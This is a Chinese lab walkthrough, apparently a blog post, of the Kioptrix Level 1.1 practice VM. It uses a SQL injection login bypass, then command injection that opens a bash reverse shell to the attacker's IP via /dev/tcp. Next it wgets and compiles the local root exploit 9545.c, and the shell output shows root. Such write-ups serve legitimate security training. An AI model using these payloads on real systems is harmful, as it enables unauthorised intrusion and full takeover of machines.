zoukankan      html  css  js  c++  java
  • kioptrix level1.1

    kioptrix level-1.1

    存活检测

    image-20211208105948864

    端口扫描

    image-20211208110024985

    80访问

    image-20211208110132395

    查看源代码

    image-20211208110156307

    尝试爆破,先试一下,无结果

    尝试万能密码,sql注入

    image-20211208110314467

    image-20211208110326463

    image-20211208110347467

    万能密码可以绕过登录

    替换数据包进行登录

    image-20211208110445882

    登录成功

    命令执行

    image-20211208110529450

    反弹shell

    127.0.0.1 |  bash -i >& /dev/tcp/192.168.245.183/5454 0>&1
    nv -lvvp 5454
    

    image-20211208113515361

    提权

    uname -a 查看版本

    Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

    searchsploit 9545
    
    /usr/share/exploitdb/exploits/linux/local/9545.c
    
    └─# nc -lvvp 5454                                                                                                                                                          1 ⨯
    listening on [any] 5454 ...
    connect to [192.168.245.183] from localhost [192.168.245.97] 32773
    bash: no job control in this shell
    bash-3.00$ cd /tmp
    bash-3.00$ wget http://192.168.245.183/9545.c
    --00:27:28--  http://192.168.245.183/9545.c
               => `9545.c'
    Connecting to 192.168.245.183:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 9,408 (9.2K) [text/plain]
    
        0K .........                                             100%  640.87 MB/s
    
    00:27:28 (640.87 MB/s) - `9545.c' saved [9408/9408]
    
    bash-3.00$ ls
    9545.c
    bash-3.00$ gcc -o muma 9545.c
    9545.c:376:28: warning: no newline at end of file
    bash-3.00$ ls
    9545.c
    muma
    bash-3.00$ ./muma
    sh: no job control in this shell
    sh-3.00# whoami
    root
    sh-3.00# 
    
  • 相关阅读:
    俩人搞对象,山上骑马
    历史不会偏袒任何一个缺乏正义、良知的人。
    力量和对力量的控制
    超级管理员
    电信F412
    prim算法
    Maven pom.xml配置详解
    PorterDuffXfermode的用法
    使用MaskFilter
    Android drawText获取text宽度的三种方式
  • 原文地址:https://www.cnblogs.com/liyu8/p/15661897.html
Copyright © 2011-2022 走看看